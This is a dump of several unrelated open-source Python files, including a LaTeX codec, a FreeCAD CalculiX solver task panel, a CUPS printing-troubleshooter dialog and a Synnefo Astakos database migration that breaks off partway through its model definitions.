self.register(u'\N{GREEK CAPITAL LETTER TAU}', b'\\Tau', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER UPSILON}', b'\\Upsilon', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER PHI}', b'\\Phi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER CHI}', b'\\Chi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER PSI}', b'\\Psi', mode='math')
self.register(u'\N{GREEK CAPITAL LETTER OMEGA}', b'\\Omega', mode='math')
self.register(u'\N{COPYRIGHT SIGN}', b'\\copyright')
self.register(u'\N{COPYRIGHT SIGN}', b'\\textcopyright')
self.register(u'\N{LATIN CAPITAL LETTER A WITH ACUTE}', b"\\'A")
self.register(u'\N{LATIN CAPITAL LETTER I WITH ACUTE}', b"\\'I")
self.register(u'\N{HORIZONTAL ELLIPSIS}', b'\\ldots')
self.register(u'\N{TRADE MARK SIGN}', b'^{TM}', mode='math')
self.register(u'\N{TRADE MARK SIGN}', b'\\texttrademark', package='textcomp')
def register(self, unicode_text, latex_text, mode='text', package=None,
decode=True, encode=True):
if package is not None:
# TODO implement packages
pass
if mode == 'math':
# also register text version
self.register(unicode_text, b'$' + latex_text + b'$', mode='text',
package=package, decode=decode, encode=encode)
# XXX for the time being, we do not perform in-math substitutions
return
# tokenize, and register unicode translation
tokens = tuple(self.lexer.get_tokens(latex_text, final=True))
if decode:
self.max_length = max(self.max_length, len(tokens))
if not tokens in self.unicode_map:
self.unicode_map[tokens] = unicode_text
# also register token variant with brackets, if appropriate
# for instance, "\'{e}" for "\'e", "\c{c}" for "\c c", etc.
# note: we do not remove brackets (they sometimes matter,
# e.g. bibtex uses them to prevent lower case transformation)
if (len(tokens) == 2
and tokens[0].name.startswith('control')
and tokens[1].name == 'chars'):
alt_tokens = (
tokens[0], latex_lexer.Token('chars', b'{'),
tokens[1], latex_lexer.Token('chars', b'}'),
)
if not alt_tokens in self.unicode_map:
self.unicode_map[alt_tokens] = u"{" + unicode_text + u"}"
if encode and unicode_text not in self.latex_map:
self.latex_map[unicode_text] = (latex_text, tokens)
_LATEX_UNICODE_TABLE = LatexUnicodeTable(latex_lexer.LatexIncrementalDecoder())
# incremental encoder does not need a buffer
# but decoder does
class LatexIncrementalEncoder(latex_lexer.LatexIncrementalEncoder):
"""Translating incremental encoder for latex. Maintains a state to
determine whether control spaces etc. need to be inserted.
"""
table = _LATEX_UNICODE_TABLE
"""Translation table."""
def __init__(self, errors='strict'):
latex_lexer.LatexIncrementalEncoder.__init__(self, errors=errors)
self.reset()
def reset(self):
self.state = 'M'
def get_space_bytes(self, bytes_):
"""Inserts space bytes in space eating mode."""
if self.state == 'S':
# in space eating mode
# control space needed?
if bytes_.startswith(b' '):
# replace by control space
return b'\\ ', bytes_[1:]
else:
# insert space (it is eaten, but needed for separation)
return b' ', bytes_
else:
return b'', bytes_
def get_latex_bytes(self, unicode_, final=False):
""":meth:`encode` calls this function to produce the final
sequence of latex bytes. This implementation simply
encodes every sequence in *inputenc* encoding. Override to
process the bytes in some other way (for example, for token
translation).
"""
if not isinstance(unicode_, basestring):
raise TypeError(
"expected unicode for encode input, but got {0} instead"
.format(unicode_.__class__.__name__))
# convert character by character
for pos, c in enumerate(unicode_):
# attempt input encoding first
# if this succeeds, then we don't need a latex representation
try:
bytes_ = c.encode(self.inputenc, 'strict')
except UnicodeEncodeError:
pass
else:
space, bytes_ = self.get_space_bytes(bytes_)
self.state = 'M'
if space:
yield space
yield bytes_
continue
# inputenc failed; let's try the latex equivalents
# of common unicode characters
try:
bytes_, tokens = self.table.latex_map[c]
except KeyError:
# translation failed
if errors == 'strict':
raise UnicodeEncodeError(
"latex", # codec
unicode_, # problematic input
pos, pos + 1, # location of problematic character
"don't know how to translate {1} ({0}) into latex"
.format(c, repr(c)))
elif errors == 'ignore':
pass
elif errors == 'replace':
# use the \\char command
# this assumes
# \usepackage[T1]{fontenc}
# \usepackage[utf8]{inputenc}
yield b'{\\char'
yield str(ord(c)).encode("ascii")
yield b'}'
self.state = 'M'
else:
raise ValueError(
"latex codec does not support {0} errors"
.format(errors))
else:
# translation succeeded
space, bytes_ = self.get_space_bytes(bytes_)
# update state
if tokens[-1].name == 'control_word':
# we're eating spaces
self.state = 'S'
else:
self.state = 'M'
if space:
yield space
yield bytes_
class LatexIncrementalDecoder(latex_lexer.LatexIncrementalDecoder):
"""Translating incremental decoder for latex."""
table = _LATEX_UNICODE_TABLE
"""Translation table."""
def __init__(self, errors='strict'):
latex_lexer.LatexIncrementalDecoder.__init__(self)
self.max_length = 0
def reset(self):
latex_lexer.LatexIncrementalDecoder.reset(self)
self.token_buffer = []
# python codecs API does not support multibuffer incremental decoders
def getstate(self):
raise NotImplementedError
def setstate(self, state):
raise NotImplementedError
def get_unicode_tokens(self, bytes_, final=False):
for token in self.get_tokens(bytes_, final=final):
# at this point, token_buffer does not match anything
self.token_buffer.append(token)
# new token appended at the end, see if we have a match now
# note: match is only possible at the *end* of the buffer
# because all other positions have already been checked in
# earlier iterations
for i in range(1, len(self.token_buffer) + 1):
last_tokens = tuple(self.token_buffer[-i:]) # last i tokens
try:
unicode_text = self.table.unicode_map[last_tokens]
except KeyError:
# no match: continue
continue
else:
# match!! flush buffer, and translate last bit
for token in self.token_buffer[:-i]: # exclude last i tokens
yield token.decode(self.inputenc)
yield unicode_text
self.token_buffer = []
break
# flush tokens that can no longer match
while len(self.token_buffer) >= self.table.max_length:
yield self.token_buffer.pop(0).decode(self.inputenc)
# also flush the buffer at the end
if final:
for token in self.token_buffer:
yield token.decode(self.inputenc)
self.token_buffer = []
class LatexCodec(codecs.Codec):
IncrementalEncoder = None
IncrementalDecoder = None
def encode(self, unicode_, errors='strict'):
"""Convert unicode string to latex bytes."""
return (
self.IncrementalEncoder(errors=errors).encode(unicode_, final=True),
len(unicode_),
)
def decode(self, bytes_, errors='strict'):
"""Convert latex bytes to unicode string."""
return (
self.IncrementalDecoder(errors=errors).decode(bytes_, final=True),
len(bytes_),
)
def find_latex(encoding):
# check if requested codec info is for latex encoding
if not encoding.startswith('latex'):
return None
# set up all classes with correct latex input encoding
inputenc_ = encoding[6:] if encoding.startswith('latex+') else 'ascii'
class IncrementalEncoder_(LatexIncrementalEncoder):
inputenc = inputenc_
class IncrementalDecoder_(LatexIncrementalDecoder):
inputenc = inputenc_
class Codec(LatexCodec):
IncrementalEncoder = IncrementalEncoder_
IncrementalDecoder = IncrementalDecoder_
class StreamWriter(Codec, codecs.StreamWriter):
pass
class StreamReader(Codec, codecs.StreamReader):
pass
return codecs.CodecInfo(
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder_,
incrementaldecoder=IncrementalDecoder_,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
codecs.register(find_latex)
|
chrisjaquet/FreeCAD | refs/heads/master | src/Mod/Fem/_TaskPanelFemSolverCalculix.py | 1 | # ***************************************************************************
# * *
# * Copyright (c) 2013-2015 - Juergen Riegel <FreeCAD@juergen-riegel.net> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
__title__ = "CalculiX Job Control Task Panel"
__author__ = "Juergen Riegel"
__url__ = "http://www.freecadweb.org"
import FemToolsCcx
import FreeCAD
import os
import time
if FreeCAD.GuiUp:
import FreeCADGui
import FemGui
from PySide import QtCore, QtGui
from PySide.QtCore import Qt
from PySide.QtGui import QApplication
class _TaskPanelFemSolverCalculix:
def __init__(self, solver_object):
self.form = FreeCADGui.PySideUic.loadUi(FreeCAD.getHomePath() + "Mod/Fem/TaskPanelFemSolverCalculix.ui")
self.fem_prefs = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Fem")
ccx_binary = self.fem_prefs.GetString("ccxBinaryPath", "")
if ccx_binary:
self.CalculixBinary = ccx_binary
print ("Using CalculiX binary path from FEM preferences: {}".format(ccx_binary))
else:
from platform import system
if system() == 'Linux':
self.CalculixBinary = 'ccx'
elif system() == 'Windows':
self.CalculixBinary = FreeCAD.getHomePath() + 'bin/ccx.exe'
else:
self.CalculixBinary = 'ccx'
self.fem_prefs = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Fem")
self.solver_object = solver_object
self.Calculix = QtCore.QProcess()
self.Timer = QtCore.QTimer()
self.Timer.start(300)
self.fem_console_message = ''
# Connect Signals and Slots
QtCore.QObject.connect(self.form.tb_choose_working_dir, QtCore.SIGNAL("clicked()"), self.choose_working_dir)
QtCore.QObject.connect(self.form.pb_write_inp, QtCore.SIGNAL("clicked()"), self.write_input_file_handler)
QtCore.QObject.connect(self.form.pb_edit_inp, QtCore.SIGNAL("clicked()"), self.editCalculixInputFile)
QtCore.QObject.connect(self.form.pb_run_ccx, QtCore.SIGNAL("clicked()"), self.runCalculix)
QtCore.QObject.connect(self.form.rb_static_analysis, QtCore.SIGNAL("clicked()"), self.select_static_analysis)
QtCore.QObject.connect(self.form.rb_frequency_analysis, QtCore.SIGNAL("clicked()"), self.select_frequency_analysis)
QtCore.QObject.connect(self.Calculix, QtCore.SIGNAL("started()"), self.calculixStarted)
QtCore.QObject.connect(self.Calculix, QtCore.SIGNAL("stateChanged(QProcess::ProcessState)"), self.calculixStateChanged)
QtCore.QObject.connect(self.Calculix, QtCore.SIGNAL("error(QProcess::ProcessError)"), self.calculixError)
QtCore.QObject.connect(self.Calculix, QtCore.SIGNAL("finished(int)"), self.calculixFinished)
QtCore.QObject.connect(self.Timer, QtCore.SIGNAL("timeout()"), self.UpdateText)
self.update()
def femConsoleMessage(self, message="", color="#000000"):
self.fem_console_message = self.fem_console_message + '<font color="#0000FF">{0:4.1f}:</font> <font color="{1}">{2}</font><br>'.\
format(time.time() - self.Start, color, message.encode('utf-8', 'replace'))
self.form.textEdit_Output.setText(self.fem_console_message)
self.form.textEdit_Output.moveCursor(QtGui.QTextCursor.End)
def printCalculiXstdout(self):
out = self.Calculix.readAllStandardOutput()
if out.isEmpty():
self.femConsoleMessage("CalculiX stdout is empty", "#FF0000")
else:
try:
out = unicode(out, 'utf-8', 'replace')
rx = QtCore.QRegExp("\\*ERROR.*\\n\\n")
rx.setMinimal(True)
pos = rx.indexIn(out)
while not pos < 0:
match = rx.cap(0)
FreeCAD.Console.PrintError(match.strip().replace('\n', ' ') + '\n')
pos = rx.indexIn(out, pos + 1)
out = os.linesep.join([s for s in out.splitlines() if s])
self.femConsoleMessage(out.replace('\n', '<br>'))
except UnicodeDecodeError:
self.femConsoleMessage("Error converting stdout from CalculiX", "#FF0000")
def UpdateText(self):
if(self.Calculix.state() == QtCore.QProcess.ProcessState.Running):
self.form.l_time.setText('Time: {0:4.1f}: '.format(time.time() - self.Start))
def calculixError(self, error):
print ("Error() {}".format(error))
self.femConsoleMessage("CalculiX execute error: {}".format(error), "#FF0000")
def calculixStarted(self):
print ("calculixStarted()")
print (self.Calculix.state())
self.form.pb_run_ccx.setText("Break CalculiX")
def calculixStateChanged(self, newState):
if (newState == QtCore.QProcess.ProcessState.Starting):
self.femConsoleMessage("Starting CalculiX...")
if (newState == QtCore.QProcess.ProcessState.Running):
self.femConsoleMessage("CalculiX is running...")
if (newState == QtCore.QProcess.ProcessState.NotRunning):
self.femConsoleMessage("CalculiX stopped.")
def calculixFinished(self, exitCode):
print ("calculixFinished() {}".format(exitCode))
print (self.Calculix.state())
# Restore previous cwd
QtCore.QDir.setCurrent(self.cwd)
self.printCalculiXstdout()
self.Timer.stop()
self.femConsoleMessage("CalculiX done!", "#00AA00")
self.form.pb_run_ccx.setText("Re-run CalculiX")
self.femConsoleMessage("Loading result sets...")
self.form.l_time.setText('Time: {0:4.1f}: '.format(time.time() - self.Start))
fea = FemToolsCcx.FemToolsCcx(None, self.solver_object)
fea.reset_mesh_purge_results_checked()
fea.inp_file_name = self.inp_file_name
QApplication.setOverrideCursor(Qt.WaitCursor)
fea.load_results()
QApplication.restoreOverrideCursor()
self.form.l_time.setText('Time: {0:4.1f}: '.format(time.time() - self.Start))
def getStandardButtons(self):
return int(QtGui.QDialogButtonBox.Close)
def update(self):
'fills the widgets'
self.form.le_working_dir.setText(self.solver_object.WorkingDir)
if self.solver_object.AnalysisType == 'static':
self.form.rb_static_analysis.setChecked(True)
elif self.solver_object.AnalysisType == 'frequency':
self.form.rb_frequency_analysis.setChecked(True)
return
def accept(self):
FreeCADGui.ActiveDocument.resetEdit()
def reject(self):
FreeCADGui.ActiveDocument.resetEdit()
def choose_working_dir(self):
current_wd = self.setup_working_dir()
wd = QtGui.QFileDialog.getExistingDirectory(None, 'Choose CalculiX working directory',
current_wd)
if wd:
self.solver_object.WorkingDir = wd
else:
self.solver_object.WorkingDir = current_wd
self.form.le_working_dir.setText(self.solver_object.WorkingDir)
def write_input_file_handler(self):
QApplication.restoreOverrideCursor()
if self.check_prerequisites_helper():
QApplication.setOverrideCursor(Qt.WaitCursor)
self.inp_file_name = ""
fea = FemToolsCcx.FemToolsCcx(None, self.solver_object)
fea.set_analysis_type(self.solver_object.AnalysisType)
fea.update_objects()
fea.write_inp_file()
if fea.inp_file_name != "":
self.inp_file_name = fea.inp_file_name
self.femConsoleMessage("Write completed.")
self.form.pb_edit_inp.setEnabled(True)
self.form.pb_run_ccx.setEnabled(True)
else:
self.femConsoleMessage("Write .inp file failed!", "#FF0000")
QApplication.restoreOverrideCursor()
def check_prerequisites_helper(self):
self.Start = time.time()
self.femConsoleMessage("Check dependencies...")
self.form.l_time.setText('Time: {0:4.1f}: '.format(time.time() - self.Start))
fea = FemToolsCcx.FemToolsCcx(None, self.solver_object)
fea.update_objects()
message = fea.check_prerequisites()
if message != "":
QtGui.QMessageBox.critical(None, "Missing prerequisit(s)", message)
return False
return True
def start_ext_editor(self, ext_editor_path, filename):
if not hasattr(self, "ext_editor_process"):
self.ext_editor_process = QtCore.QProcess()
if self.ext_editor_process.state() != QtCore.QProcess.Running:
self.ext_editor_process.start(ext_editor_path, [filename])
def editCalculixInputFile(self):
print ('editCalculixInputFile {}'.format(self.inp_file_name))
if self.fem_prefs.GetBool("UseInternalEditor", True):
FemGui.open(self.inp_file_name)
else:
ext_editor_path = self.fem_prefs.GetString("ExternalEditorPath", "")
if ext_editor_path:
self.start_ext_editor(ext_editor_path, self.inp_file_name)
else:
print ("External editor is not defined in FEM preferences. Falling back to internal editor")
FemGui.open(self.inp_file_name)
def runCalculix(self):
print ('runCalculix')
self.Start = time.time()
self.femConsoleMessage("CalculiX binary: {}".format(self.CalculixBinary))
self.femConsoleMessage("Run CalculiX...")
# run Calculix
print ('run CalculiX at: {} with: {}'.format(self.CalculixBinary, os.path.splitext(self.inp_file_name)[0]))
# change cwd because ccx may crash if directory has no write permission
# there is also a limit of the length of file names so jump to the document directory
self.cwd = QtCore.QDir.currentPath()
fi = QtCore.QFileInfo(self.inp_file_name)
QtCore.QDir.setCurrent(fi.path())
self.Calculix.start(self.CalculixBinary, ['-i', fi.baseName()])
QApplication.restoreOverrideCursor()
def select_analysis_type(self, analysis_type):
if self.solver_object.AnalysisType != analysis_type:
self.solver_object.AnalysisType = analysis_type
self.form.pb_edit_inp.setEnabled(False)
self.form.pb_run_ccx.setEnabled(False)
def select_static_analysis(self):
self.select_analysis_type('static')
def select_frequency_analysis(self):
self.select_analysis_type('frequency')
# That function overlaps with FemTools setup_working_dir and needs to be removed when we migrate fully to FemTools
def setup_working_dir(self):
wd = self.solver_object.WorkingDir
if not (os.path.isdir(wd)):
try:
os.makedirs(wd)
except:
print ("Dir \'{}\' from FEM preferences doesn't exist and cannot be created.".format(wd))
import tempfile
wd = tempfile.gettempdir()
print ("Dir \'{}\' will be used instead.".format(wd))
return wd
|
jwren/intellij-community | refs/heads/master | python/testData/quickFixes/PyMakeMethodStaticQuickFixTest/noSelf_after.py | 249 | __author__ = 'ktisha'
class Child(Base):
def __init__(self):
super(Child, self).__init__()
@staticmethod
def f():
test = 1 |
poolooloo/emind-cloud-printer | refs/heads/master | troubleshoot/Shrug.py | 6 | #!/usr/bin/python3
## Printing troubleshooter
## Copyright (C) 2008, 2009, 2010, 2011, 2012 Red Hat, Inc.
## Author: Tim Waugh <twaugh@redhat.com>
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from gi.repository import Gtk
from .base import *
class Shrug(Question):
def __init__ (self, troubleshooter):
Question.__init__ (self, troubleshooter, "Shrug")
page = self.initial_vbox (_("Sorry!"),
_("There is no obvious solution to this "
"problem. Your answers have been "
"collected together with "
"other useful information. If you "
"would like to report a bug, please "
"include this information."))
expander = Gtk.Expander.new(_("Diagnostic Output (Advanced)"))
expander.set_expanded (False)
sw = Gtk.ScrolledWindow ()
expander.add (sw)
textview = Gtk.TextView ()
textview.set_editable (False)
sw.add (textview)
page.pack_start (expander, True, True, 0)
self.buffer = textview.get_buffer ()
box = Gtk.HButtonBox ()
box.set_border_width (0)
box.set_spacing (3)
box.set_layout (Gtk.ButtonBoxStyle.END)
page.pack_start (box, False, False, 0)
self.save = Gtk.Button.new_from_stock (Gtk.STOCK_SAVE)
box.pack_start (self.save, False, False, 0)
troubleshooter.new_page (page, self)
def display (self):
self.buffer.set_text (self.troubleshooter.answers_as_text ())
return True
def connect_signals (self, handler):
self.save_sigid = self.save.connect ('clicked', self.on_save_clicked)
def disconnect_signals (self):
self.save.disconnect (self.save_sigid)
def on_save_clicked (self, button):
while True:
parent = self.troubleshooter.get_window()
dialog = Gtk.FileChooserDialog (transient_for=parent,
action=Gtk.FileChooserAction.SAVE)
dialog.add_buttons (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL,
Gtk.STOCK_SAVE, Gtk.ResponseType.OK)
dialog.set_do_overwrite_confirmation (True)
dialog.set_current_name ("troubleshoot.txt")
dialog.set_default_response (Gtk.ResponseType.OK)
dialog.set_local_only (True)
response = dialog.run ()
dialog.hide ()
if response != Gtk.ResponseType.OK:
return
try:
f = open (dialog.get_filename (), "w")
f.write (self.buffer.get_text (start=self.buffer.get_start_iter (),
end=self.buffer.get_end_iter (),
include_hidden_chars=False))
except IOError as e:
err = Gtk.MessageDialog (parent=parent,
modal=True, destroy_with_parent=True,
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CLOSE,
text=_("Error saving file"))
err.format_secondary_text (_("There was an error saving "
"the file:") + "\n" +
e.strerror)
err.run ()
err.destroy ()
continue
del f
break
|
andyzsf/Cactus- | refs/heads/master | cactus/deployment/s3/__init__.py | 20 | #coding:utf-8
|
Erethon/synnefo | refs/heads/develop | snf-astakos-app/astakos/im/migrations/0050_project_logs.py | 10 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
NORMAL = 1
SUSPENDED = 10
TERMINATED = 100
class Migration(DataMigration):
def forwards(self, orm):
logs = []
suspended = orm.Project.objects.filter(state=SUSPENDED)
for project in suspended:
logs.append(orm.ProjectLog(
project=project, date=project.deactivation_date,
reason=project.deactivation_reason,
from_state=NORMAL, to_state=SUSPENDED))
terminated = orm.Project.objects.filter(state=TERMINATED)
for project in terminated:
logs.append(orm.ProjectLog(
project=project, date=project.deactivation_date,
reason=project.deactivation_reason,
from_state=NORMAL, to_state=TERMINATED))
orm.ProjectLog.objects.bulk_create(logs)
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'im.additionalmail': {
'Meta': {'object_name': 'AdditionalMail'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"})
},
'im.approvalterms': {
'Meta': {'object_name': 'ApprovalTerms'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'im.astakosuser': {
'Meta': {'object_name': 'AstakosUser', '_ormbases': ['auth.User']},
'accepted_email': ('django.db.models.fields.EmailField', [], {'default': 'None', 'max_length': '75', 'null': 'True', 'blank': 'True'}),
'accepted_policy': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'activation_sent': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'affiliation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'auth_token_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'auth_token_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_signed_terms': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deactivated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deactivated_reason': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'disturbed_quota': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'email_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_credits': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_signed_terms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'invitations': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'is_rejected': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'level': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'moderated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'moderated_data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['im.Resource']", 'null': 'True', 'through': "orm['im.AstakosUserQuota']", 'symmetrical': 'False'}),
'rejected_reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True'}),
'verification_code': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True'}),
'verified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'im.astakosuserauthprovider': {
'Meta': {'ordering': "('module', 'created')", 'unique_together': "(('identifier', 'module', 'user'),)", 'object_name': 'AstakosUserAuthProvider'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'affiliation': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auth_backend': ('django.db.models.fields.CharField', [], {'default': "'astakos'", 'max_length': '255'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'info_data': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'module': ('django.db.models.fields.CharField', [], {'default': "'local'", 'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_providers'", 'to': "orm['im.AstakosUser']"})
},
'im.astakosuserquota': {
'Meta': {'unique_together': "(('resource', 'user'),)", 'object_name': 'AstakosUserQuota'},
'capacity': ('snf_django.lib.db.fields.IntDecimalField', [], {'max_digits': '38', 'decimal_places': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'resource': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Resource']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"})
},
'im.authproviderpolicyprofile': {
'Meta': {'ordering': "['priority']", 'object_name': 'AuthProviderPolicyProfile'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'authpolicy_profiles'", 'symmetrical': 'False', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_exclusive': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'policy_add': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_automoderate': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_create': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_limit': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True'}),
'policy_login': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_remove': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_required': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_switch': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'authpolicy_profiles'", 'symmetrical': 'False', 'to': "orm['im.AstakosUser']"})
},
'im.chain': {
'Meta': {'object_name': 'Chain'},
'chain': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'im.component': {
'Meta': {'object_name': 'Component'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'auth_token_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'auth_token_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
